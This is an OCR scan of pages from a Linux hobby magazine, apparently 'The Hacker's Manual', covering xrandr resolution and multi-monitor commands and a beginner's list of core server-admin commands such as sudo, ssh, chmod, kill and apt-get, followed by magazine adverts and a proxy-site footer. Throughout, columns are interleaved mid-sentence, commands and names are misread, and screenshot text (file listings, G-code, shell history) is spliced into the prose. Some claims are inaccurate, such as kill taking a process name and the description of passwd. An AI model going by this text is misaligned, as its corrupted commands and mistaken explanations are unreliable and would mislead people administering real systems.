both -output and -mode flags with a single -s flag, which I nlckQnlck-pe: ~
tricks up xraj|ntck®ntck-pc:~$ xrandr - output VGA-1 - panning 1920x1080
tells xrandr to set the resolution for the default display to the ts capability>ntckgntck-pc:~$ |
limitation of
specified size $ xrandr -s 1680x1050 . on't survive r

Add new resolutions following command:


Thanks to bugs in your hardware or drivers, the full set of $ xrandr -delmode 1920xl200_60.00
resolutions your monitor supports aren't always detected. There are many more screen-related tricks up xrandr's
Thankfully, one of the big advantages of xrandr over the sleeve. First, if you have multiple displays connected and you
Screen Display utility is its ability to configure and set wish to quickly disable one, simply enter this line:
resolutions that are not automatically detected. The cvt $ xrandr -output VGA-0 -off
command allows you to calculate the settings a particular If you want to bring it back, just replace -off with -auto
resolution requires, then set up a new mode for xrandrto use for the default resolution, or -mode 1368x768 for a specific
before finally applying it to your target display. Start by using supported resolution.
the cvt command like so: $ cvt 1920 1080 60 If you have two or more monitors set up, you may wish to
The three figures refer to the horizontal and vertical sizes, change their positions within the virtual display. This is done
plus the desired refresh rate (in most cases this should be by moving one display relative to the other using the following
60). This will deliver an output including the all-important flags: —left-of. -right-of, above and below, eg:
Modeline. Use the mouse cursor to select everything after $ xrandr -output VGA-0 -left-of HDMI-0
Modeline, then right-click and choose Copy. Next, type the This would move the VGA-connected monitor's display to
following, adding a space after -newmode and without the left of the display connected via your HDMI port.
pressing Enter $ xrandr -newmode . Now right-click at the
cursor point and choose 'Paste'. This should produce a line Mirror displays
like the following: But what if you'd like your two displays to mirror the contents
$ xrandr-newmode “1920xl200_60.00” 193.25 1920 2056 of each other? For this, use the -same-as flag:
2256 2592 1200 1203 1209 1245 -hsync +vsync $ xrandr -output VGA-0 -same-as HDMI-0
Now hit Enter, then type xrandr and you should see that If one display has a higher resolution than the other, the
the mode has been added to the end of the list of supported display with the lower resolution will chop off the bits it can't
resolutions. (Should you wish to remove it at this point, use show: by using the -panning flag you can have the display
the -rmmode flag , eg xrandr -rmmode 1920xl200_60.00 .) move with the mouse to ensure it’s always onscreen—simply
Next, you need to add the mode to the list of supported set it to match the resolution of your main display:
resolutions. To do this, type the following: $ xrandr -output VGA-0 -panning 1920x1080
$ xrandr -addmode HDMI-0 1920xl200_60.00 Use these features with care—the only way we’ve found to
Again, replace HDMI-0 with your chosen input, and make disable mirroring and panning settings is through a reboot.
sure 1920xl200_60.00 matches exactly what was listed Even this isn’t all that xrandr can do—type man xrandr
inside the quotation marks by the cvt command. for a comprehensive list of its capabilities, including how to
If the resolution is supported, you should now be able to rotate, invert and scale the screen. One major limitation of
switch to it: xrandr is that its changes aren't persistent—in other words,
$ xrandr -output HDMI-0 -mode 1920xl200_60.00 they don't survive when you reboot or when you log off. (To
Should you subsequently want to remove this mode for get around this problem, check out Make Xandr Changes
any reason, first make sure you're not using it, then issue the Persistent box, left). ■

The Hacker's Manual | 139


The terminal

Admin: Core
commands
20 terminal commands that all Linux web server admins should know.

re you an ‘accidental admin’? Someone who realised, straightforward to do through the graphical control panel,

A too late, that they were responsible for the workings


of a Linux server and - because something has gone
wrong - finds themselves lost in a world of terminals and
command lines that make little sense to normal humans?
you're suddenly out of the world of icons and explanatory
tooltips and into the world of the text-only Terminal.
To make things worse, for a lot of people the first time they
have to deal with the Terminal is when something has gone
What is SSH, you may be asking yourself. Do those letters wrong and can't be fixed through the control panel. Or
after 'tar' actually mean anything real? How do I apply perhaps you've just read that there's a major security flaw
security patches to my server? Don't worry, you're not alone. sweeping the web and all Linux servers must be updated at
And to help you out, we've put together this quick guide with once (it happens - search for 'Heartbleed' to find out more).
essential Linux commands that every accidental admin Suddenly you realise that your nice control panel hasn’t
should know. actually been updating your server's operating system with
security patches and your small personal blog may well be
Becoming an accidental admin part of a massive international botnet used to launch DDOS
While we'd argue that they should, not everyone who starts attacks against others. Not only are you a stranger in a
using Linux as an operating system does so through choice. strange land, you're probably trying to recover or fix
We suspect that most people's first interaction with Linux something that was really important to you, but which you
happens somewhat unwittingly You click a button on your never gave much thought to while it was being hosted for a
ISP's account page to set up a personal or business web couple of pounds a month and seemed hassle-free.
server - for a website, email address or online application - You are an ‘accidental admin'. Someone who is responsible
and suddenly you're a Linux admin. Even though you don’t for keeping a Linux webserver running and secure—but you
know it yet. didn't even realise it. You thought all that was included in your
When you're starting out with your web server, things are couple of pounds a month you pay to your ISP - and only
usually straightforward. Nearly all hosting providers will give found out it's not when it was too late.
you a web interface such as Cpanel or Plesk to manage your Since most webservers are running Ubuntu, this guide is
server. These are powerful pieces of software that give you based on that particular distribution. And all the commands
quick an easy access to logs, mail services and one-click here are just as applicable to a Linux desktop as they are to a
installations of popular applications such as Wordpress or web server, of course.
forums. But the first time you have to do something that isn't
Dsudo
670 df The most fundamental thing to know about Linux's approach
671 nan df
672 df -h to administration is that there are two types of accounts that
673 top
’ 674 w can be logged in: a regular user or an administrator (aka
675 nano
676 dir 'superuser'). Regular users aren't allowed to make changes to
677 history
678 diff -r /Rcdta/studtopc/theRaptorRatd/Ptcs /ncdta/sdbl/Ptcs files or directories that they don't own—and in particular this
679 sudo su
680 ssh root0crazy8ball.htxt.co.zax applies to the core operating system files which are owned by
681 ssh rootgcrazy8baU.htxt.co.zo
I 682 ssh rootghtxt.co.za an admin called 'roof.
683 ssh rootg41.79.76.130
684 tfconftg Root or admin privileges can be temporarily granted to a
> Can’t remember > 685 Is | less
regular user by typing sudo in front of any Linux command.
' 686 utt
that really clever ■‘ 687 Is | less
688 apt-get update So to edit the configuration file that controls which disks are
thing you did last ' 689 sudo apt-get update
690 history mounted using the text editor, nano, you might type sudo
week? History is jstudtopcgstudtopc :*$ |
nano /etc/fstab (we don't recommend this unless you know
your friend.

140 | The Hacker's Manual


Core commands

Connecting to the server


As an accidental admin, your first challenge is yourserver.com (or you can replace yourserver. together and use encrypted keys for access
going to be connecting to your server in the first com withan IPaddress). instead. To follow this approach, you’ll need to
place. In your web control panel, you might see The ssh command will open a secure shell create a public/private SSH keypair on your
an option to open a Terminal or console in your on the target machine with the specified machine (for example. Ubuntu users can type
web browser, but this tends to be quite a laggy username. You should get a password prompt something like ssh-keygen -t rsa -b 4096 -C
way of doing things. before the connection is allowed and you will “your_email@example.com”) and copy the
It's better to open up a Terminal window on end up in a text interface that starts in the home public part of the key into the .ssh folder on the
your own machine (if you're running Ubuntu just folder of the username. target server.
press Alt+Ctrl+t, if you're on Windows you'll If you're going to be connecting regularly, You will find some full instructions for doing
need an application like PuTTY). Now. at your there's an even more secure way of using ssh this here: https://help.github.com/articles/
command prompt, type ssh username© and that's to bypass the password prompt all generating-an-ssh-key

OOP .«<•«.«» (Ml: - the adaptor, but it’s also useful to see if you’re connected to a
studiope(Jstudidpe:~$ ssh rootfki.'W. •
Welcome to Ubuntu 16.64.1 LTS (GNU/Linux 3.16.6 x86_64)
VPN or not. If a connection is described as ethO, for example,
* Documentation; https://hclp.ubuntu.con
it’s an Ethernet cable meanwhile tunO is a VPN tunnel.
♦ Management: https://landscdpe.canontcal.com
• Support: https://ubuntu.com/advantage If you're changing
EJ chown names, permissions
There’s tons more you can learn about chmod and we or ownership most
strongly recommend that you do, but it has a sister command commands have
a-R or-r option,
that’s even more powerful. While chmod dictates what users
which stands
who aren't the owner of a file can do, the chown command for'recursive'.
changes the file owner and group that it belongs to Essentially, this
completely. Again, you'll probably need to put sudo in front changes the
of anything you chown . but the syntax is again simple. An attributes of all
> Even if someone copies your key, they’ll still need a files inside a folder,
example might be chown myname:mygroup filename.file .
password to unlock it. rather than just the
folder itself.
D service restart
what you’re doing). After entering sudo. you’ll be asked for No, we’re not telling you to 'try turning it off and on again',
your user password. On a desktop PC. this is the same one but sometimes it’s a good place to start (and sometimes its
that you use to log in. If you're logging into your own essential to load changes into memory). It’s possible you
webserver, however, there's a good chance that you'll already might be used to start and stop background processes on a
be the root user and won't need a password to make Windows desktop through the graphical System Monitor or
important changes. Task Manager in Windows. However, in the command line
If you can't execute sudo commands, your web host has Terminal to a server it’s a little more tricky, but not by much.
restricted your level of access and it probably can’t be Confusingly, because many Linux distributions have
changed. User accounts can be part of 'groups' in Linux and changed the way they manage startup services (by
only members of the sudoers groups can use the sudo switching to systemd) there's two ways of doing this. The
command to temporarily grant themselves admin privileges. old way. which still works a lot of the time, is to just type
service myservice restart . preceded with sudo .when it’s
Dsu necessary. The new, correct, way is a little more verbose:
While sudo gives you great power, it still has limitations. Most systemctl restart myservice.service . So if you want to restart
of all. if you've got a whole bunch of commands to enter, you Apache, for example, the core software which turns a mere
don't want to have to type it out at the start of every single computer into a web server, it would be sudo systemctl
line [at least the password has a 5 minute timeout-Ed]. This restart apache2.service.
is where su comes in, which will give you superuser powers
until you close the terminal window. Type sudosu followed
by your password, and you'll see the prompt change from Baby•Triceratops.stl
background.jpg
yourname@yourserver to root@yourserver .You might think BACKGROUND.kra
BankTransactions.csv
su stands for superuser, but It’s actually a command to Bosc_x2.stl
batteryholders.geode
change to any user on the system and if it’s used without an BigDataarttele.doex.docx
btg•gear -nodSAE.stl
account name after it, su assumes you want to be root. btg_ptxel_star.stl
Blackboard
However, using sumyname will switch you back to your Black Rhino Mozambique Gas Giant v2.docx
blank share certtftcatc.pdf
BOM.ods
original, non-super, login. bootngr.cfi
B&P_PuzzleChatr.zip > Unless you
Branch_vase_lc(l).STL

EJ ifconfig Branch_vase_lc.STL
Branch_vase_l.STL
can read 1,000
Branch_vase_2.STL lines a second,
Since you’re troubleshooting a web server, it's probably a brave_elz ing-alii s.stl
c406_firnwarc_update_tnstructtons_660F.pdf you’ll need to
good idea to get as many details about its actual connection c4e6_rev070H_bootable_nedta_tnstructtons.zip
c466 rev676H_ftrnware_update_uttltty.zip use Is I less to
as possible noted down. The ifconfig command can be run cablc_cltps.stl
Calculatton_Ttana_FIHAL AO.xlsx
explore folders.
without sudo privileges and tells you details about every live calibrateddell .ice
calibrated.ten
network connection, physical or virtual. Often this is just for cape•town•344257_1286.Jpg
Cape Town, Houscsof Parliament.JPG
checking your IP address, which it reports under the name of

The Hacker's Manual | 141


The terminal

Bls EJdf
The key to understanding the console is all in the path (see Maybe your server problems are to do with disk space? Type
Path To box, below), which tells you whereabouts you are in df and you'll get a full breakdown of the size and usage of
the folder structure at any given time. But how do you know every volume currently mounted on your system. By default
what else is in your current location? Easy: you use Is. The it'll give you big numbers in bytes, but if you run df-h (which
Is command lists all the files within the folder that you're stands for 'human readable' the volume sizes will be reported
currently browsing. If there's a lot of files to list, use Is I less in megabytes, gigabytes or whatever is appropriate.
to pause at the end of each page of filenames.
ED apt-get update && upgrade
Beat Probably the single most important command to know and
A command you'll often see if you're following instructions fear. We all know that to keep a computer system secure you
you've found online - and aren't always sure what you're need to keep it updated, but if you've got control of a Linux
doing - cat is short for concatenate and is used to combine box the chances are that it isn't doing that automatically.
files together. In its simplest form it can be used to take file! A simple sudo apt-get update will order your system to
txt and file2.txt and turn them into file3.txt, but it can also be check for the latest versions of any applications it's running,
combined with other commands to create a new file based on and sudo apt-get upgrade will download and install them.
searching for patterns or words in the original. For the most part these are safe commands to use and
Quite often you'll see cat used simply to explore a single should be run regularly—but occasionally updating one piece
file-if you don't specify an output filename, cat just writes of software can break another, so back-up first...
what it finds to the screen. So online walkthroughs often use
cat as a way of searching for text within a file and displaying ED grep
the results in the terminal. This is because cat is non­ As computer commands go there are few more fantastically
destructive—it’s very hard to accidentally use cat to change named for the newcomer than the grep [it’s a real verb!-Ed]
the original file where other commands might do. command. How on earth are you ever going to master this
Linux stuff if it just makes words up? But grep is a great
□ find utility for looking for patterns within files. Want to find every
A useful and under used command, the find command is line that talks about Cheddar in a book about cheeses? grep
pretty self-explanatory. It can be used to find stuff. Typing it by "cheddar" bookofcheese.txt will do it for you. Even better you
itself is much like Is, except that it lists all of the files within can use it to search within multiple files using wildcards. So
sub-directories of your current location as well as those in grep “cheddar” *.txt will find every text file in which cheddar
> Nano isn’t the your current directory. You can use it to search for filenames is reference. So now you grok grep , right?
only terminal
using the format find -name “filename.txt”. By inserting a
text editor, but
path before the -name option, you can point it at specific ED top
it’s the easiest
starting folders to speed things up. By changing the When you're working in a graphical user interface such as a
to use.
-name option you can search by days since last accessed Linux desktop environment or Windows desktop, there's
(-atime ) or more. always an application like System Monitor or Task Manager
which will call up a list of running applications and give you
details about how many CPU cycles, memory or storage
Mji9e S7e.eeeeee they're using. It s a vital troubleshooting tool if you have a
H109 S190.000000
jSltced at: Sat 19-11-2616 15:11:69 program that's misbehaving and you don't know what it is.
;Baslc settings: Layer height: 6.1 Walls: 6.7 Fill: 26
;Prtnt tine: 5 hours 39 ntnutes In a similar way, you can bring up a table of running
jFilancnt used: 16.646n 29.6g
;Filanent cost: None applications in the Linux Terminal that does the same thing
;M196 S76 ;Unconnent to add your own bed tenperature line
;H169 S186 ;Unconnent to add your own tenperature line by typing top.
G21 ;nctrtc values
G96 ;absolute positioning Like a lot of command line utilities, it's not immediately
M82 ;set extruder to absolute node
H167 ;start with the fan off obvious how you can close top once you're finished with it
C28 >6 Y6 ;nove X/Y to nin endstops
G28 20 ;nove Z to nin endstops without closing the terminal window itself—the almost
Cl Z15.6 F7866 ;nove the platforn down 15nn
C92 EG ;zero the extruded length universal command to get back to a prompt is Ctrl+c.
Cl F266 E3 jextrude 3nn of feed stock
C92 EO ;zero the extruded length again
G1 F7866
;Put printing nessage on LCD screen
ED kill, killall
H117 Printing...
Using top you can figure out which application is using all
;Layer count: 198
;LAYER:6
your CPU cycles, but how do you stop it without a right-click >
g Cet Help JJ Write Out 2J Where Is ffl Cut Text Justify Q Cur Pos Q Prev Pape End process menu? You use the command kill followed by
Exit E Pead File 3 Replace E Uncut Text S To Spell 3 Co To line 3 Hext Pape the process name. If you want to be sure and kill every

Path to
When you open a Terminal window within Linux, machine you're logged into. If you open up a followed by a dollar sign. When you first open a
it can be a bit disorientating. But the words that Terminal on your desktop, usually the username Terminal, it will usually print yourname@
sit in front of the flashing cursor will tell you and hostname are the same. So you'll see ycurname:~$. The tildeindicates you're in the
where you are. 'myname@myname'. When you log into a home folder for your username. If the dollar sign
The first word is the name of the user you’re remote server, though, they'll be very different. is replaced with a '#', you're using the machine
logged in on. and it's followed by an sign. This information is followed by a colon which as a root user. See cd for moving around and
The second word is the hostname of the is followed by the path to the directory you're in. watch how the path changes as you do.

142 | The Hacker's Manual


Core commands

20. chmod
User permissions are one of the most important Wordpress to be able to write some files so it can by three digits to indicate what the owner,
parts of L nux security to understand. Every file update them, but there's also a lot of files you members of its group and everyone else can do.
has a set of permissions which defines who can don't want it to be able to change—and you really Each digit from 0-7. where 7 allows for read, write
see a file: who can read and write to a file: and don’t want to give it power to execute code and execute and 1 is execute only. If your user
who can execute a file as a program. unless you have to. The flipside is that problems ’owns’ the file in question, the syntax is simple,
A file which can be seen by web visitors, but with web servers can be traced back to incorrect chmod 777 filename . for example, will give all
can only be changed by a specific user, is just file permissions, when an app needs to be able to users the ability to read and write to a file. It’s
about as basic as it gets when it comes to locking modify a file but has been locked out by default. good practice not to leave files in this state on a
down a server. The problem is that some files Your friend in this area is chmod. It changes webserver—for obvious reasons. If you don’t own
need to be changeable and some don’t—think of permissions for which users and groups can the file, you’ll need to add sudo to the front of
a Wordpress installation for a blog. You want read, write or execute files. It’s usually followed that command.

process with a name that contains that application name, you >pc()studiopc:/etc$ cd /ctc/Xll/Xsession.d
bpc0studtopc:/etc/Xll/Xscsston.d$ Is
use killall. So kill firefox will close down a web browser on :art 66x11-connon_localhost 98atk-adaptor
►_xdg-runttne 66x11 - coRRon_xdg_path 96consolektt
a Linux desktop. connon_process-args 60xbrlapl 90gpg-agent
■coRRon_xresources 60xdg-user-dirs-update 96qt5-opengl
connonxhost-local 65coRpiz_proftie - on■session 96qt-ally
EDw connon xsessionrc
?ck_untty_support
65snappy
76gconfd_path-on-session
96x11-connonssh-agent
95dbu s_updatc-activation-env
From the weirdness of grep to the elegance of the w coHHon_deternine- startup 70in- config_launch 99upstart
»anon-session_gnonerc 75dbusdbus-launch 99x11-connon_start
command, a whole command in a single letter. If you think ie-session_gnonerc Sloverlay-scrollbar
>pc0studlopc:/etc/Xll/Xsesston.d$ cd ..
another user is logged into your system, this is an important ►pc^studiopc:/etc/Xll$ cd ..
>pc0studiopc:/etc$ cd ..
command to know. You can use w to list all currently active ipc^studlopc:/$ Is
dev Include lib nedla proc sbtn swap ublqulty-apt-clone vnllnuz
users, although don’t rely on it too much as it’s not hard for a etc tnitrd.iRg ltb32 ltbx32 Rnt root snap sys usr vRltnuz.olq

hacker to be hidden. hoRe Inltrd.iRQ.old Ub64 lost+found opt run srv var
>pc0studtope:/$ Q

ED passwd
You must use passwd with extreme care. Ultra extreme care.
Because the next word you write after it will become your > Keep an eye on the directory path in front of the
command line to figure out where you are.
login password, so if you type it incorrectly or forget it. you’re
going to find yourself in serious trouble.
You can only change your own user's password by default, rm is used to remove or delete a file and cp will copy files
but if you grant yourself sudo powers you can change any and folders.
user's credentials by including their username after the Just as with cd , you can either enter a filename to
password itself. Typing sudo passwd . meanwhile, will change operate on a file in the directory you’re working in or a full
the password for root. path starting from the root of the drive with ~ . For mv the
Check out the manual (man passwd) page for some syntax is mv ~/locationl/filel.file ~/location2/location .
useful options to expire passwords after a certain period of The big thing to remember is that in the Terminal there’s
time and so on. no undo or undelete function: if you rm a file and it's gone
forever (or at least will require very specialist skills to retrieve)
ED cd and in a similar fashion, if you mv or cp a file you'd better
If you have a graphical interface and file browser, it's pretty make a note of where it went. One command
that’s invaluable
easy to move to new locations on your hard drive just by
is man which is
clicking on them. In the Terminal, we know where we are ED nano short for'manual'.
because of the path (see the Path To box. left). and switch It might seem odd, if you've spent your life in graphical This will open up
location using cd which stands for‘change directory'. applications and utilities, but complex programs run in the the help file for any
The cd command in mainly used in three ways: text terminal, too. There are several text editors which other command.
So if you want
0 cd foldername This will move you to that folder, provided normally come as part of the whole package, notably nano
to know all the
it exists within the folder you're currently browsing (use Is if and vi. You can open a blank document by typing nano , or options for the Is
you’re not sure). you can edit an existing one by typing nano ~path/to/text,txt command, simply
0 cd ~/path/to/folder This will take you to a specific (and do the same with vi). Some of the terminology may type man Is and
location within your home folder (the ~ character tells cd see what comes up.
seem odd. though: To write out (Ctrl+o) means save, for
to start looking in your home folder). Starting with a / will tell example and so on.
cd to start the path at the root folder of your hard drive.
0 cd.. This final useful command simply takes you up one ED history
level in the folder structure. And finally, if you've been copying and pasting commands
from the web all day. you might want to check up on what
ED mv & rm & cp you've actually done. You can use history to give you a list of
When you get the hang of it. using a terminal as a file all the terminal commands entered going back a long, long
manager becomes pretty simple and quite a joyful way. Execute specific numbered commands with !<num>,
experience. As well as cd. the three fundamental commands you can go back through recent commands just by using the
you’ll need to remember are mv, rm and cp . The mv up and down arrows (and re-issue them by tapping Enter), or
command is used to move a file from one location to another, search for commands by pressing Ctrl+r.

The Hacker's Manual | 143


MARS APOLLO
MISSIONS

DISCOVER HOW HUMANITY REACHED BEYOND EAR' I

EXPLORATION for beginners

' Find out >


everything you’ve
ever wanted
to know about
< outer space y

_ WORLDS
&CANI TOMORROW
Explore our
incredible planet
and the secrets
beneath the
OUR SEAS
v surface /

Everything you want to know about the world we live in AMAZING


HEROES
HOW IT
ASTROLOGY TECHNOLOGY
units

Annual SMART HOME

HISTORY OF # THE STORY Of

I HUMANS
Annual

Understand the
world we live
in, from science MNOLOGY ^TRANSPORT QhISTORY OSPACE

and tech to the


, environment .

Get great savings when 1000s of great titles, many World-wide delivery and
you buy direct from us not available anywhere else super-safe ordering
FEED YOUR MIND
WITH OUR BOOKAZINES
Explore the secrets of the universe, from the days of the
dinosaurs to the miracles of modern science!

inc —

Life’s «
Science
COLLECTION

Little
Mysteries
13} the truth _
Mundchr
O1“ of Kiencr and ttrh . SUPERMASSIVE
!■! AASB

UNDERSTANDING
<iia n

i the Ws =
Discover
HUMAN" answers to
'SUCCESS
the most
fascinating futurebookazines

questions

Follow us on Instagram lef) @futurebookazines

el www.magazinesdirect.com
r Magazines, back issues & bookazines.
SUBSCRIBE &
SAVE UP TO 61%
Delivered direct to your door
or straight to your device
12 nuill-Jriv comfortfood recipes

worn
Hello . yicroajA
DSR3YSMIAS
<ni Knm ii-iip
iMii.iiH-t-O*kn ing

iisnioxa Ml ■ ■ AaWIVI tetalTWBaV


FOCUS*
The Hew knits,
1 with these handheld marvels

cords and coats < itmsasttandpros ■ 3


Loungewear
lingerie you'll love

ink'
.
KING
(<» IllMljO lent Iranian emperor
, . trixue to do mkuttJt
t^land
miM<riilst)fc liervshtm APES
utumn scenes and
ITGIIADEYOI II otour and light ' J - *<
HATH ROOM '
MS
4G

WHEN CREEOENCE RULED THE WORLD!


★CLASSIC*

PHOTOWS
tASY
birds an<istarr- hMCOHTMc
ft TO 200™ CAREER
Sing'nS tWngs't' Rte ate KEITH r/2.8GMQ$S«
SUCCESS
Thebest
RICHARDS fl mi III ii Bolster your txinl- I
account today I
NIGKELBAGK
KISS 2DCCE22
CVKEEE5
X06UKMCn
BUSH
"®F( +

HIS GREATEST SONGS •S&


GC
WHATJIMI MKAXSTO MF.*j ItHly GMxxk. Mkk Fkrtwwd.
t&'OW ...

Choose from over 8o magazines and make great savings off the store price!
Binders, books and back issues also available
Simply visit www.magazinesdirect.com
No hidden costs Shipping included in all prices We deliver to over 100 countries Q Secure online payment

FUTURE
magazines direct.com
Official Magazine Subscription Store
HACKER’S
MANUAL 2023
148 PACKED PAGES! WITH HACKS THE
OTHER LINUX MANUALS WON’T TELL YOU

SECURITY Exploit weaknesses and block attacks


LINUX Discover and customise the kernel
PRIVACY Lock down every byte of your data
9021

HARDWARE Hack tablets, servers, desktops and drives

Hacker’s Toolkit
H

Discover the basics of hacking with our Get the lowdown on the best distros,
in-depth and easy-to-follow tutorials including the latest Ubuntu LTS release

REVISED £
UPDATED
B O O K A Z IN E

EDITION

Stay secure with essential guides to


industry security tools and techniques
9000

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy